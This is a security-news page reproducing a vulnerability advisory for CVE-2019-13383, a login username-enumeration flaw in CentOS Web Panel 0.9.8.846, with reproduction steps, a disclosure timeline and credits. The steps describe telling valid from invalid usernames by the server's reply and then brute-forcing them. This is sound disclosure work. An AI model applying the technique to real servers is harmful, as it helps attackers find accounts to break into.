Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2019-13383: CentOS-Control-Web-Panel-CVE/CVE-2019-13383.md at master · i3umi3iei3ii/CentOS-Control-Web-Panel-CVE

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.846, the Login process allows attackers to check whether a username is valid by reading the HTTP response.

CVE
Open in Source
#vulnerability#web#jira

Information

Product             : CWP Control Web Panel
Vulnerability Name  : User enumeration on user panel
version             : 0.9.8.846
Fixed on            : 0.9.8.848
Test on             : CentOS 7.6.1810 (Core)
Reference           : http://centos-webpanel.com/
                    : https://control-webpanel.com/changelog
CVE-Number          : CVE-2019-13383

Description

The vulnerability allows remote attacker to check whether a username is valid by reading the HTTP response

Reproduce

The target server has user "user1"
  1. Login with invalid username and password
  1. Intercept the request
  1. From the request, if the user dose not exist, the server responses “suspended”
  1. if the user dose exist, the server responses “failed” or nothing (depends on version)
  1. Try brute-forcing username against the server

Timeline

2019-07-06: Discovered the bug
2019-07-06: Reported to vendor
2019-07-06: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Advisory published

Discovered by

Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE